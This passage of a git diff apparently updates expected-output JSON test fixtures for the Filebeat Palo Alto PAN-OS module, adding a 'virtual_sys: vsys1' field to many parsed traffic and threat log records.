@@ -7832,6 +7911,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -7922,6 +8002,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -8012,6 +8093,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -8112,6 +8194,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8209,6 +8292,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8306,6 +8390,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8406,6 +8491,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8503,6 +8589,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8593,6 +8680,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", 
@@ -8690,6 +8778,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8790,6 +8879,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -8887,6 +8977,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -8984,6 +9075,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -9081,6 +9173,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -9181,6 +9274,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9281,6 +9375,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9381,6 +9476,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9471,6 +9567,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", 
@@ -9571,6 +9668,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9671,6 +9769,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -9771,6 +9870,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json index 0d9b9000a97..ef9975180c1 100644 --- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json @@ -74,6 +74,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -178,6 +179,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -282,6 +284,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -386,6 +389,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" 
@@ -490,6 +494,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -594,6 +599,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -698,6 +704,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -802,6 +809,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -906,6 +914,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1010,6 +1019,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1114,6 +1124,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1218,6 +1229,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" 
@@ -1322,6 +1334,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1426,6 +1439,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1530,6 +1544,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1634,6 +1649,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1738,6 +1754,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1842,6 +1859,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -1946,6 +1964,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2050,6 +2069,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" 
@@ -2154,6 +2174,7 @@ "panw.panos.threat.resource": "b.scorecardresearch.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "b.scorecardresearch.com" @@ -2258,6 +2279,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2362,6 +2384,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2466,6 +2489,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2570,6 +2594,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2674,6 +2699,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2778,6 +2804,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -2882,6 +2909,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" 
@@ -2986,6 +3014,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3090,6 +3119,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3194,6 +3224,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3298,6 +3329,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3402,6 +3434,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3506,6 +3539,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3610,6 +3644,7 @@ "panw.panos.threat.resource": "consent.cmp.oath.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "consent.cmp.oath.com" @@ -3714,6 +3749,7 @@ "panw.panos.threat.resource": "cdn.taboola.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "cdn.taboola.com" 
@@ -3821,6 +3857,7 @@ "panw.panos.threat.resource": "rules.quantcount.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "rules.quantcount.com" @@ -3928,6 +3965,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4035,6 +4073,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4142,6 +4181,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4249,6 +4289,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4356,6 +4397,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4463,6 +4505,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" 
@@ -4570,6 +4613,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4677,6 +4721,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4784,6 +4829,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4891,6 +4937,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -4998,6 +5045,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -5105,6 +5153,7 @@ "panw.panos.threat.resource": "srv-2018-11-30-22.config.parsely.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "srv-2018-11-30-22.config.parsely.com" @@ -5212,6 +5261,7 @@ "panw.panos.threat.resource": "www.googleadservices.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "www.googleadservices.com" 
@@ -5316,6 +5366,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5420,6 +5471,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5524,6 +5576,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5628,6 +5681,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5732,6 +5786,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5836,6 +5891,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -5940,6 +5996,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6044,6 +6101,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" 
@@ -6148,6 +6206,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6252,6 +6311,7 @@ "panw.panos.threat.resource": "service.maxymiser.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "service.maxymiser.net" @@ -6359,6 +6419,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6466,6 +6527,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6573,6 +6635,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6680,6 +6743,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6787,6 +6851,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -6894,6 +6959,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" 
@@ -7001,6 +7067,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7108,6 +7175,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7215,6 +7283,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7322,6 +7391,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7429,6 +7499,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7536,6 +7607,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7643,6 +7715,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7750,6 +7823,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" 
@@ -7857,6 +7931,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" @@ -7964,6 +8039,7 @@ "panw.panos.threat.resource": "segment-data.zqtk.net/", "panw.panos.type": "THREAT", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220", "segment-data.zqtk.net" diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json index a6877841bd3..9d86fbf8e1b 100644 --- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json @@ -80,6 +80,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -189,6 +190,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -301,6 +303,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -410,6 +413,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -522,6 +526,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -631,6 +636,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -740,6 +746,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -849,6 +856,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -958,6 +966,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1067,6 +1076,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1176,6 +1186,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1285,6 +1296,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1394,6 +1406,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1503,6 +1516,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1612,6 +1626,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1721,6 +1736,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -1830,6 +1846,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -1939,6 +1956,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2048,6 +2066,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2157,6 +2176,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2266,6 +2286,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2375,6 +2396,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2487,6 +2509,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2597,6 +2620,7 @@ "panw.panos.sub_type": "drop", 